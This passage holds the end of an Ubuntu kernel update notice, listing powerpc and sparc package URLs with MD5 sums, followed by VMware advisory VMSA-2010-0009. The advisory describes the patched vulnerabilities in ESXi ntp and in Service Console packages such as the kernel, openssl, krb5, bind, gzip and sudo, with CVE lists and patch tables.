http://ports.ubuntu.com/pool/main/l/linux/kernel-image-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:  5193132 54dce7348221bcc93bbc01512d553a16
http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.31-19-powerpc-smp_2.6.31-19.56_powerpc.deb
  Size/MD5:   784762 523b94315bff20137df79c5308abd5b7
http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.31-19-powerpc64-smp_2.6.31-19.56_powerpc.deb
  Size/MD5:   801042 2a8e55b23ad4dc09ee3cbb2fdc23cc28
http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.31-19-powerpc_2.6.31-19.56_powerpc.deb
  Size/MD5:   783708 185ba99656f4fa37874e0241e9f25dbb
http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.31-19-powerpc-smp_2.6.31-19.56_powerpc.deb
  Size/MD5: 24820746 adc5365726ba88565ad89953707bd012
http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.31-19-powerpc64-smp_2.6.31-19.56_powerpc.deb
  Size/MD5: 25829918 fc82da730c6d730c5a4ac87d30594749
http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.31-19-powerpc_2.6.31-19.56_powerpc.deb
  Size/MD5: 24656226 7791f88107e97c5419f0e2d2f850c38e
http://ports.ubuntu.com/pool/main/l/linux/linux-libc-dev_2.6.31-19.56_powerpc.deb
  Size/MD5:   728146 1dabe36864839475aab9293825cfc3e4
http://ports.ubuntu.com/pool/main/l/linux/md-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:   271924 8fb200d91f158f9b0eb209df5a5ffcd4
http://ports.ubuntu.com/pool/main/l/linux/md-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:   294610 317f7d34e3cd0ac823fcc5d48bcc9a7f
http://ports.ubuntu.com/pool/main/l/linux/message-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:   210546 041508a9555e18e2b8b4cab41b26f397
http://ports.ubuntu.com/pool/main/l/linux/message-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:   216984 845e2e452ef869aa3b39ea47bfa0280b
http://ports.ubuntu.com/pool/main/l/linux/mouse-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:    25798 19a7cae7e4f693c269f54dc0f2762f33
http://ports.ubuntu.com/pool/main/l/linux/mouse-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:    28984 419926b33e2b573f8d3ccaa5ade657f1
http://ports.ubuntu.com/pool/main/l/linux/nfs-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:   314922 83dcb63807ffb50682219b20333c23bc
http://ports.ubuntu.com/pool/main/l/linux/nfs-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:   357524 a32753bfca44b1afb9b11f72b25ebb9e
http://ports.ubuntu.com/pool/main/l/linux/nic-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:  2027754 9b45ff8446ec0bad5befec2dc3ecdb72
http://ports.ubuntu.com/pool/main/l/linux/nic-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:  2247744 35d212f7569bb03564a7f0294879557f
http://ports.ubuntu.com/pool/main/l/linux/nic-pcmcia-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:   213544 3fb9afb7247290ffb3508744ab6cbb9f
http://ports.ubuntu.com/pool/main/l/linux/nic-pcmcia-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:   209776 e42b20eb402cb2a55fea2a80f5cef162
http://ports.ubuntu.com/pool/main/l/linux/nic-shared-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:   210242 78939115c860efacb83481c0687f1a7a
http://ports.ubuntu.com/pool/main/l/linux/nic-shared-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:   244856 8fcff5fb05c0921681ec2bb44637c624
http://ports.ubuntu.com/pool/main/l/linux/nic-usb-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:   111834 a6b65e618a3240d51f36f37911d1d7cc
http://ports.ubuntu.com/pool/main/l/linux/nic-usb-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:   131610 dc5625deacbac446e71517f5902376b1
http://ports.ubuntu.com/pool/main/l/linux/parport-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:    49028 ac60e4bf193e7725de6d8999c6231915
http://ports.ubuntu.com/pool/main/l/linux/parport-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:    44082 531b2cbe15ec2f62fe61bd7002b1df02
http://ports.ubuntu.com/pool/main/l/linux/pata-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:     5852 f049a9332d469b247e451868b4f22cce
http://ports.ubuntu.com/pool/main/l/linux/pata-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:     6504 32fb4de3cd714598281c2d4d5d2ee6d6
http://ports.ubuntu.com/pool/main/l/linux/pcmcia-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:    79118 e98cffbfe6f6cbffcfa6dce199dc6c46
http://ports.ubuntu.com/pool/main/l/linux/pcmcia-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:    85190 e648dc2d3e124d68c47d4ec18836097f
http://ports.ubuntu.com/pool/main/l/linux/pcmcia-storage-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:    74318 19b737ad1f43e7be1c6cc7e211085424
http://ports.ubuntu.com/pool/main/l/linux/pcmcia-storage-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:    27228 0b5b4529d140289e616bded832055cbc
http://ports.ubuntu.com/pool/main/l/linux/plip-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:     8538 9010c080bd63660bf529930565d49f62
http://ports.ubuntu.com/pool/main/l/linux/plip-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:     9818 e909c37d26354ddbdceddc72628d71b3
http://ports.ubuntu.com/pool/main/l/linux/ppp-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:    58830 ae6573a0664b5486360156dd6711776c
http://ports.ubuntu.com/pool/main/l/linux/ppp-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:    70140 83085dfd5f4bb24ab67dd967e6b609cc
http://ports.ubuntu.com/pool/main/l/linux/sata-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:    23714 86a598e1b13e4d6963475732e7a1097a
http://ports.ubuntu.com/pool/main/l/linux/sata-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:    30804 b382bc0bfffd61156d0f8b3dc90bd307
http://ports.ubuntu.com/pool/main/l/linux/scsi-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:  1556894 ea2800c85a0115ad2e524a8b4ab4cb91
http://ports.ubuntu.com/pool/main/l/linux/scsi-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:  1509110 e42499f8bdbad020301a11617f6b65a8
http://ports.ubuntu.com/pool/main/l/linux/serial-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:    81698 095ff78875bae0b90edd07ac3b51993d
http://ports.ubuntu.com/pool/main/l/linux/serial-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:    88530 1a36ce88a0c6f7b495c869da15bf9d69
http://ports.ubuntu.com/pool/main/l/linux/storage-core-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:    64400 8ff9a2aef998409440c1139f3db8c7ee
http://ports.ubuntu.com/pool/main/l/linux/storage-core-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:    76990 392faa17f8c688e3856d91fb657eba09
http://ports.ubuntu.com/pool/main/l/linux/usb-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:   141540 636e6d1827591a3aa46b82d7dc0b8ab6
http://ports.ubuntu.com/pool/main/l/linux/usb-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:   151356 0f39f4d13770ceab049be6fb9c83fc16

sparc architecture (Sun SPARC/UltraSPARC):

http://ports.ubuntu.com/pool/main/l/linux/block-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb
  Size/MD5:   139430 14f825a3334b18614059312527002767
http://ports.ubuntu.com/pool/main/l/linux/crypto-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb
  Size/MD5:    70106 6dde178febff58a546142209374e1616
http://ports.ubuntu.com/pool/main/l/linux/fat-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb
  Size/MD5:    46510 64b0be995ce3d697a84cd3b0665ffe68
http://ports.ubuntu.com/pool/main/l/linux/firewire-core-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb
  Size/MD5:    93974 28048300aba15f2a3937723bc0afc5cd
http://ports.ubuntu.com/pool/main/l/linux/fs-core-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb
  Size/MD5:   588788 c17e7feb3442296b7ed93c92cb988625
http://ports.ubuntu.com/pool/main/l/linux/fs-secondary-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb
  Size/MD5:   148426 6f429deb9df760daf28c04ad93ea6758
http://ports.ubuntu.com/pool/main/l/linux/input-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb
  Size/MD5:    75862 6f382de52d9e1b52611c70a703895e5d
http://ports.ubuntu.com/pool/main/l/linux/kernel-image-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb
  Size/MD5:  2892370 ec9440bb8ee05a7ac071992c5711139f
http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.31-19-sparc64-smp_2.6.31-19.56_sparc.deb
  Size/MD5:   601506 1b56c59b3df953a640760b876d752465
http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.31-19-sparc64_2.6.31-19.56_sparc.deb
  Size/MD5:   600680 166e5056f971d5fa031230c1af67d028
http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.31-19-sparc64-smp_2.6.31-19.56_sparc.deb
  Size/MD5: 20496992 6ebab55c96d6be71ffb8c3a493d31a74
http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.31-19-sparc64_2.6.31-19.56_sparc.deb
  Size/MD5: 20193918 98b3c6e44f8e302cca36530b434e9525
http://ports.ubuntu.com/pool/main/l/linux/linux-libc-dev_2.6.31-19.56_sparc.deb
  Size/MD5:   740254 b1a453339b4d68717a445f07b87b53a4
http://ports.ubuntu.com/pool/main/l/linux/md-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb
  Size/MD5:   266068 1b8caecb838a9dd9b9c765f6603197a3
http://ports.ubuntu.com/pool/main/l/linux/message-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb
  Size/MD5:   209168 e0e78f6a435e0ca46d5680e08d6e8db0
http://ports.ubuntu.com/pool/main/l/linux/mouse-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb
  Size/MD5:    26268 f730be03c2b96e53e779a5d3df4cde93
http://ports.ubuntu.com/pool/main/l/linux/nfs-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb
  Size/MD5:   314080 b673ee07d0c907d6ba00a561b915868d
http://ports.ubuntu.com/pool/main/l/linux/nic-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb
  Size/MD5:  1675490 8642bd711b6643bd26ddc80674cef9e4
http://ports.ubuntu.com/pool/main/l/linux/nic-shared-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb
  Size/MD5:   222882 136f6b9e24a16823f7309438fd0bd60a
http://ports.ubuntu.com/pool/main/l/linux/nic-usb-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb
  Size/MD5:   121954 75090ea655204cc898db4634fc8aa021
http://ports.ubuntu.com/pool/main/l/linux/parport-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb
  Size/MD5:    38798 a11bcf765626194255c1d5a7d0106c2a
http://ports.ubuntu.com/pool/main/l/linux/pata-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb
  Size/MD5:   100798 af5903bc65fd381528f733fb1ba4100f
http://ports.ubuntu.com/pool/main/l/linux/plip-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb
  Size/MD5:     8932 ebcb23a73a538276e41fcff9b7bb1d15
http://ports.ubuntu.com/pool/main/l/linux/ppp-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb
  Size/MD5:    62926 7eba529ee44c2e107b693605dcbf1247
http://ports.ubuntu.com/pool/main/l/linux/sata-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb
  Size/MD5:   120960 8f63ad112de0797974650631dee53d13
http://ports.ubuntu.com/pool/main/l/linux/scsi-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb
  Size/MD5:  1217912 87a2a4f21ee86e0f36bc5298a226513b
http://ports.ubuntu.com/pool/main/l/linux/serial-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb
  Size/MD5:   101576 057a15ca3fa891e47216adcf5ae071f7
http://ports.ubuntu.com/pool/main/l/linux/storage-core-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb
  Size/MD5:   200148 f90834ae24c0f516ef83fa5aa66bafbb
http://ports.ubuntu.com/pool/main/l/linux/usb-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb
  Size/MD5:   184674 d704744a26941df63b9195288306fa7b

. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1


               VMware Security Advisory

Advisory ID: VMSA-2010-0009 Synopsis: ESXi ntp and ESX Service Console third party updates Issue date: 2010-05-27 Updated on: 2010-05-27 (initial release of advisory) CVE numbers: CVE-2009-2695 CVE-2009-2908 CVE-2009-3228 CVE-2009-3286 CVE-2009-3547 CVE-2009-3613 CVE-2009-3612 CVE-2009-3620 CVE-2009-3621 CVE-2009-3726 CVE-2007-4567 CVE-2009-4536 CVE-2009-4537 CVE-2009-4538 CVE-2006-6304 CVE-2009-2910 CVE-2009-3080 CVE-2009-3556 CVE-2009-3889 CVE-2009-3939 CVE-2009-4020 CVE-2009-4021 CVE-2009-4138 CVE-2009-4141 CVE-2009-4272 CVE-2009-3563 CVE-2009-4355 CVE-2009-2409 CVE-2009-0590 CVE-2009-1377 CVE-2009-1378 CVE-2009-1379 CVE-2009-1386 CVE-2009-1387 CVE-2009-4212 CVE-2009-1384 CVE-2010-0097 CVE-2010-0290 CVE-2009-3736 CVE-2010-0001 CVE-2010-0426 CVE-2010-0427 CVE-2010-0382


  1. Summary

ESXi update for ntp and ESX Console OS (COS) updates for COS kernel, openssl, krb5, gcc, bind, gzip, sudo.

  1. Relevant releases

VMware ESX 4.0.0 without patches ESX400-201005401-SG, ESX400-201005406-SG, ESX400-201005408-SG, ESX400-201005407-SG, ESX400-201005405-SG, ESX400-201005409-SG

  1. Problem Description

a. Service Console update for COS kernel

Updated COS package "kernel" addresses the security issues that are
fixed through versions 2.6.18-164.11.1.

The Common Vulnerabilities and Exposures project (cve.mitre.org)
has assigned the names CVE-2009-2695, CVE-2009-2908, CVE-2009-3228,
CVE-2009-3286, CVE-2009-3547, CVE-2009-3613 to the security issues
fixed in kernel 2.6.18-164.6.1

The Common Vulnerabilities and Exposures project (cve.mitre.org)
has assigned the names CVE-2009-3612, CVE-2009-3620, CVE-2009-3621,
CVE-2009-3726 to the security issues fixed in kernel 2.6.18-164.9.1.

The Common Vulnerabilities and Exposures project (cve.mitre.org)
has assigned the names CVE-2007-4567, CVE-2009-4536, CVE-2009-4537,
CVE-2009-4538 to the security issues fixed in kernel 2.6.18-164.10.1

The Common Vulnerabilities and Exposures project (cve.mitre.org)
has assigned the names CVE-2006-6304, CVE-2009-2910, CVE-2009-3080,
CVE-2009-3556, CVE-2009-3889, CVE-2009-3939, CVE-2009-4020,
CVE-2009-4021, CVE-2009-4138, CVE-2009-4141, and CVE-2009-4272 to
the security issues fixed in kernel 2.6.18-164.11.1.

Column 4 of the following table lists the action required to
remediate the vulnerability in each release, if a solution is
available.

VMware         Product   Running  Replace with/
Product        Version   on       Apply Patch
=============  ========  =======  =================
VirtualCenter  any       Windows  not affected

hosted *       any       any      not affected

ESXi           any       ESXi     not affected

ESX            4.0       ESX      ESX400-201005401-SG
ESX            3.5       ESX      not applicable
ESX            3.0.3     ESX      not applicable
ESX            2.5.5     ESX      not applicable

vMA            4.0       RHEL5    affected, patch pending
  • hosted products are VMware Workstation, Player, ACE, Server, Fusion.

b. ESXi userworld update for ntp

The Network Time Protocol (NTP) is used to synchronize the time of
a computer client or server to another server or reference time
source.

A vulnerability in ntpd could allow a remote attacker to cause a
denial of service (CPU and bandwidth consumption) by using
MODE_PRIVATE to send a spoofed (1) request or (2) response packet
that triggers a continuous exchange of MODE_PRIVATE error responses
between two NTP daemons.

The Common Vulnerabilities and Exposures Project (cve.mitre.org)
has assigned the name CVE-2009-3563 to this issue.

Column 4 of the following table lists the action required to
remediate the vulnerability in each release, if a solution is
available.

VMware         Product   Running  Replace with/
Product        Version   on       Apply Patch
=============  ========  =======  =================
VirtualCenter  any       Windows  not affected

hosted *       any       any      not affected

ESXi           4.0       ESXi     ESXi400-201005401-SG
ESXi           3.5       ESXi     affected, patch pending

ESX            any       ESX      not applicable

vMA            any       RHEL5    not applicable
  • hosted products are VMware Workstation, Player, ACE, Server, Fusion.

c. Service Console package openssl updated to 0.9.8e-12.el5_4.1

OpenSSL is a toolkit implementing SSL v2/v3 and TLS protocols with
full-strength cryptography world-wide.

A memory leak in the zlib could allow a remote attacker to cause a
denial of service (memory consumption) via vectors that trigger
incorrect calls to the CRYPTO_cleanup_all_ex_data function.

The Common Vulnerabilities and Exposures Project (cve.mitre.org)
has assigned the name CVE-2009-4355 to this issue.

A vulnerability was discovered which may allow remote attackers to
spoof certificates by using MD2 design flaws to generate a hash
collision in less than brute-force time. NOTE: the scope of this
issue is currently limited because the amount of computation
required is still large.

The Common Vulnerabilities and Exposures Project (cve.mitre.org)
has assigned the name CVE-2009-2409 to this issue.

This update also includes security fixes that were first addressed
in version openssl-0.9.8e-12.el5.i386.rpm.

The Common Vulnerabilities and Exposures Project (cve.mitre.org)
has assigned the names CVE-2009-0590, CVE-2009-1377, CVE-2009-1378,
CVE-2009-1379, CVE-2009-1386 and CVE-2009-1387 to these issues.

Column 4 of the following table lists the action required to
remediate the vulnerability in each release, if a solution is
available.

VMware         Product   Running  Replace with/
Product        Version   on       Apply Patch
=============  ========  =======  =================
VirtualCenter  any       Windows  not affected

hosted *       any       any      not affected

ESXi           any       ESXi     not affected

ESX            4.0       ESX      ESX400-201005401-SG
ESX            3.5       ESX      not applicable
ESX            3.0.3     ESX      not applicable
ESX            2.5.5     ESX      not applicable

vMA            4.0       RHEL5    affected, patch pending**
  • hosted products are VMware Workstation, Player, ACE, Server, Fusion. ** see VMSA-2010-0004

d. Service Console update for krb5 to 1.6.1-36.el5_4.1 and pam_krb5 to 2.2.14-15.

Kerberos is a network authentication protocol. It is designed to
provide strong authentication for client/server applications by
using secret-key cryptography.

Multiple integer underflows in the AES and RC4 functionality in the
crypto library could allow remote attackers to cause a denial of
service (daemon crash) or possibly execute arbitrary code by
providing ciphertext with a length that is too short to be valid.

The Common Vulnerabilities and Exposures Project (cve.mitre.org)
has assigned the name CVE-2009-4212 to this issue.

The service console package for pam_krb5 is updated to version
pam_krb5-2.2.14-15. This update fixes a flaw found in pam_krb5. In
some non-default configurations (specifically, where pam_krb5 would
be the first module to prompt for a password), a remote attacker
could use this flaw to recognize valid usernames, which would aid a
dictionary-based password guess attack.

The Common Vulnerabilities and Exposures Project (cve.mitre.org)
has assigned the name CVE-2009-1384 to this issue.

Column 4 of the following table lists the action required to
remediate the vulnerability in each release, if a solution is
available.

VMware         Product   Running  Replace with/
Product        Version   on       Apply Patch
=============  ========  =======  =================
VirtualCenter  any       Windows  not affected

hosted *       any       any      not affected

ESXi           any       ESXi     not affected

ESX            4.0       ESX      ESX400-201005406-SG
ESX            3.5       ESX      affected, patch pending
ESX            3.0.3     ESX      affected, patch pending
ESX            2.5.5     ESX      affected, patch pending

vMA            4.0       RHEL5    affected, patch pending
  • hosted products are VMware Workstation, Player, ACE, Server, Fusion.

e. Service Console package bind updated to 9.3.6-4.P1.el5_4.2

BIND (Berkeley Internet Name Daemon) is by far the most widely used
Domain Name System (DNS) software on the Internet.

A vulnerability was discovered which could allow remote attacker to
add the Authenticated Data (AD) flag to a forged NXDOMAIN response
for an existing domain.

The Common Vulnerabilities and Exposures Project (cve.mitre.org)
has assigned the name CVE-2010-0097 to this issue.

A vulnerability was discovered which could allow remote attackers
to conduct DNS cache poisoning attacks by receiving a recursive
client query and sending a response that contains CNAME or DNAME
records, which do not have the intended validation before caching.

The Common Vulnerabilities and Exposures Project (cve.mitre.org)
has assigned the name CVE-2010-0290 to this issue.

A vulnerability was found in the way that bind handles out-of-
bailiwick data accompanying a secure response without re-fetching
from the original source, which could allow remote attackers to
have an unspecified impact via a crafted response.

The Common Vulnerabilities and Exposures Project (cve.mitre.org)
has assigned the name CVE-2010-0382 to this issue.

NOTE: ESX does not use the BIND name service daemon by default.

Column 4 of the following table lists the action required to
remediate the vulnerability in each release, if a solution is
available.

VMware         Product   Running  Replace with/
Product        Version   on       Apply Patch
=============  ========  =======  =================
VirtualCenter  any       Windows  not affected

hosted *       any       any      not affected

ESXi           any       ESXi     not affected

ESX            4.0       ESX      ESX400-201005408-SG
ESX            3.5       ESX      not applicable
ESX            3.0.3     ESX      not applicable
ESX            2.5.5     ESX      not applicable

vMA            4.0       RHEL5    affected, patch pending
  • hosted products are VMware Workstation, Player, ACE, Server, Fusion.

f. Service Console package gcc updated to 3.2.3-60

The GNU Compiler Collection includes front ends for C, C++,
Objective-C, Fortran, Java, and Ada, as well as libraries for these
languages

GNU Libtool's ltdl.c attempts to open .la library files in the
current working directory.  This could allow a local user to gain
privileges via a Trojan horse file.  The GNU C Compiler collection
(gcc) provided in ESX contains a statically linked version of the
vulnerable code, and is being replaced.

The Common Vulnerabilities and Exposures Project (cve.mitre.org)
has assigned the name CVE-2009-3736 to this issue.

Column 4 of the following table lists the action required to
remediate the vulnerability in each release, if a solution is
available.

VMware         Product   Running  Replace with/
Product        Version   on       Apply Patch
=============  ========  =======  =================
VirtualCenter  any       Windows  not affected

hosted *       any       any      not affected

ESXi           any       ESXi     not applicable

ESX            4.0       ESX      ESX400-201005407-SG
ESX            3.5       ESX      affected, patch pending
ESX            3.0.3     ESX      affected, patch pending
ESX            2.5.5     ESX      affected, patch pending

vMA            4.0       RHEL5    affected, patch pending
  • hosted products are VMware Workstation, Player, ACE, Server, Fusion.

g. Service Console package gzip update to 1.3.3-15.rhel3

gzip is a software application used for file compression

An integer underflow in gzip's unlzw function on 64-bit platforms
may allow a remote attacker to trigger an array index error
leading to a denial of service (application crash) or possibly
execute arbitrary code via a crafted LZW compressed file.

The Common Vulnerabilities and Exposures Project (cve.mitre.org)
has assigned the name CVE-2010-0001 to this issue.

Column 4 of the following table lists the action required to
remediate the vulnerability in each release, if a solution is
available.

VMware         Product   Running  Replace with/
Product        Version   on       Apply Patch
=============  ========  =======  =================
VirtualCenter  any       Windows  not affected

hosted *       any       any      not affected

ESXi           any       ESXi     not affected

ESX            4.0       ESX      ESX400-201005405-SG
ESX            3.5       ESX      affected, patch pending
ESX            3.0.3     ESX      affected, patch pending
ESX            2.5.5     ESX      affected, patch pending

vMA            4.0       RHEL5    affected, patch pending
  • hosted products are VMware Workstation, Player, ACE, Server, Fusion.

h. Service Console package sudo updated to 1.6.9p17-6.el5_4

Sudo (su "do") allows a system administrator to delegate authority
to give certain users (or groups of users) the ability to run some
(or all) commands as root or another user while providing an audit
trail of the commands and their arguments.

When a pseudo-command is enabled, sudo permits a match between the
name of the pseudo-command and the name of an executable file in an
arbitrary directory, which allows local users to gain privileges
via a crafted executable file.

The Common Vulnerabilities and Exposures Project (cve.mitre.org)
has assigned the name CVE-2010-0426 to this issue.

When the runas_default option is used, sudo does not properly set
group memberships, which allows local users to gain privileges via
a sudo command.

The Common Vulnerabilities and Exposures Project (cve.mitre.org)
has assigned the name CVE-2010-0427 to this issue.

Column 4 of the following table lists the action required to
remediate the vulnerability in each release, if a solution is
available.

VMware         Product   Running  Replace with/
Product        Version   on       Apply Patch
=============  ========  =======  =================
VirtualCenter  any       Windows  not affected

hosted *       any       any      not affected

ESXi           any       ESXi     not affected

ESX            4.0       ESX      ESX400-201005409-SG
ESX            3.5       ESX      not applicable
ESX            3.0.3     ESX      not applicable
ESX            2.5.5     ESX      not applicable

vMA            4.0       RHEL5    affected, patch pending
  • hosted products are VMware Workstation, Player, ACE, Server, Fusion.

  • Solution

Please review the patch/release notes for your product and version and verify the md5sum of your downloaded file.

ESX 4.0


http://bit.ly/aqTCqn md5sum: ace37cd8d7c6388edcea2798ba8be939 sha1sum: 8fe7312fe74a435e824d879d4f1ff33df25cee78 http://kb.vmware.com/kb/1013127

Note ESX400-201005001 contains the following security bulletins ESX400-201005404-SG (ntp), ESX400-201005405-SG (gzip), ESX400-201005408-SG (bind), ESX400-201005401-SG (kernel, openssl), ESX400-201005406-SG (krb5, pam_krb5), ESX400-201005402-SG (JRE), ESX400-201005403-SG (expat), ESX400-201005409-SG (sudo), ESX400-201005407-SG (gcc).

  1. References

CVE numbers http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2695 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2908 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3228 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3286 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3547 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3613 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3612 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3620 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3621 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3726 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4567 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4536 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4537 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4538 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6304 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2910 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3080 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3556 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3889 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3939 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4020 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4021 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4138 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4141 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4272 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3563 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4355 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2409 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0590 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1377 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1378 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1379 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1386 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1387 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4212 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1384 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0097 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0290 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3736 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0001 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0426 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0427 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0382
